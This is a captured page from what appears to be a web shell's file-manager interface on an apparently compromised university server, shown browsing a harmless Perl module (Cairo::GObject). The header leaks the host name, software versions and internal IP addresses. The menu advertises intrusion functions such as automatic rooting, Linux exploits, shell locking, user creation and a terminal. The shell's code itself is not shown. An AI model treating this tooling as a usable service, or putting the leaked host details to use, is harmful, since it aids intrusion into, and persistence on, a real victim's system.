Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Cairo /
[ HOME SHELL ]
Name
Size
Permission
Action
GObject
[ DIR ]
drwxr-xr-x
Install
[ DIR ]
drwxr-xr-x
GObject.pm
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GObject.pm
# # Copyright (c) 2011 by the cairo perl team (see the file README) # # Licensed under the LGPL, see LICENSE file for more information. # # $Id$ # package Cairo::GObject; use strict; use warnings; use Cairo; use Glib; use XSLoader; our $VERSION = '1.005'; XSLoader::load ('Cairo::GObject', $VERSION); 1; __END__ =head1 NAME Cairo::GObject - Integrate Cairo into the Glib type system =head1 SYNOPSIS use Cairo::GObject; # Cairo and Glib are now loaded and the Cairo types are registered with # Glib's type machinery. This allows you to correctly use Cairo types # in signals and properties. =head1 ABSTRACT Cairo::GObject registers Cairo's types (C<Cairo::Context>, C<Cairo::Surface>, etc.) with Glib's type systems so that they can be used normally in signals and properties. If you have encountered an error akin to this: GType CairoContext (15497280) is not registered with gperl -- then you need to use Cairo::GObject. =head1 AUTHORS =over =item Torsten Schoenfeld E<lt>kaffeetisch at gmx dot deE<gt> =back =head1 COPYRIGHT Copyright (C) 2011 by the cairo perl team =cut
Close